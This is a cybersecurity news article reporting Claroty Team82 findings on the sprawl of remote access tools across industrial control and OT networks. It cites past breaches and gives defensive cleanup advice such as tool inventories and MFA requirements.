The exploding demand for remote access into today's industrial control systems (ICS) and operational technology (OT) systems has created a nebulous, Internet-connected attack surface that's too attractive for cyberattackers to ignore. And cleanup is not going to be a simple affair.

Far too many ICS networks are being accessed by employees, partners, suppliers, and customers using a slapped-together mousetrap of tools, leaving these environments woefully exposed while connected to the Internet, according to researchers.

In a new analysis, Claroty's Team82 looked at 50,000 individual remote access-enabled devices running on industrial networks with dedicated OT hardware, and found 55% to have at least four remote access tools (RATs) in their environments. A full third (33%) reported using six or more RATs. Some organizations reported using up to 16 different of them.

Industries represented in the examples examined by the Team82 researchers included pharmaceuticals, consumer goods, food and beverage, automotive, oil and gas, mining, and manufacturing — many of which are considered critical infrastructure sectors.

"Within critical infrastructure, there is sometimes a bigger physical risk associated with a breach, depending on the jeopardized device," says Tal Laufer, Claroty's vice president of products, secure access. "That being said, all organizations with this type of tool sprawl are at risk, since it can create security gaps in their networks for threat actors to exploit."

Making matters even more complicated for cybersecurity teams, the Team82 report found that 79% of the organizations they surveyed have more than two remote access management tools in their environment that don't meet basic enterprise-grade security standards.

"Most of these tools lack the session recording, auditing, and role-based access controls that are necessary to properly defend an OT environment," the Team82 report said. "Some lack basic security features such as multi-factor authentication (MFA) options, or have been discontinued by their respective vendors and no longer receive feature or security updates."

**Cyberattackers Notice Sprawling OT Remote Access Attack Surface**

Adversaries are already well aware of the malicious possibilities that these remote access tools unlock — and have been for several years.

Laufer notes that several massive breaches in recent years have been the result of misconfigured remote access tools, including Colonial Pipeline in 2021 and Change Healthcare earlier this year.

As far back as 2020, analysts at Kaspersky warned about the risk of cyberattacks against remote access tools like TeamViewer and RMS to breach ICS environments. And in January 2023, CISA joined with the NSA to issue a warning that adversaries were launching widespread campaigns against remote management systems like AnyDesk to breach federal agencies.

Those warnings have played out: A threat actor was discovered attempting to drop XMRing cryptominer malware using TeamViewer in May 2023. Likewise, the remote access tool TeamViewer was targeted in failed attempts to compromise systems by LockBit 3.0 ransomware group in early 2024. Similarly, remote access tool production systems were compromised at AnyDesk last February, forcing the vendor to revoke all of its security clearances and reset all Web portal passwords.

Despite these warnings, ICS/OT operators are in a particularly tough spot without a clear path toward protecting themselves. The Team82 findings demonstrate how the sheer number of these tools can easily pile up within an environment, creating an ever-creeping blob of remote access surface area ripe for adversaries to probe for success. As the report detailed, each tool brings along with it its own supply chain weaknesses, often including a lack of basic, best-practice security features like MFA, auditing, and session recording.

Compounding the issue is a basic lack of monitoring, detection, and policy control tooling that works across disparate remote access systems, leaving them open to misconfigurations, as messy policy and control management, the report added.

The report added that managing all these various RATs, and the hardware behind them, is an expensive operational proposition.

**OT Remote Access Cleanup**

Unsurprisingly, the first step on the path to securing remote access for ICS/OT networks is to get a full inventory of the tools that provide access to OT assets, according to the report.

"A critical first step is ensuring you have complete visibility into your organization’s OT network to understand how many and which solutions are providing access to OT assets and industrial control systems (ICS)," Laufer explains.

Next, those solutions that don't meet basic enterprise cybersecurity requirements need to go — pronto.

"From there, engineers and assets managers need to actively eliminate or minimize the use of low-security remote access tools in the OT environment — especially taking into consideration those with known vulnerabilities or those lacking essential security features such as MFA," the researcher stresses.

It's also crucial to develop and require baseline security standards across the organization's supply chain. "Beyond this, security teams should also govern the use of remote access tools connected to OT and ICS," Laufer says. "This can help with alignment of security requirements and expansion of those requirements as needed throughout third parties within the supply chain."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

Tag

#web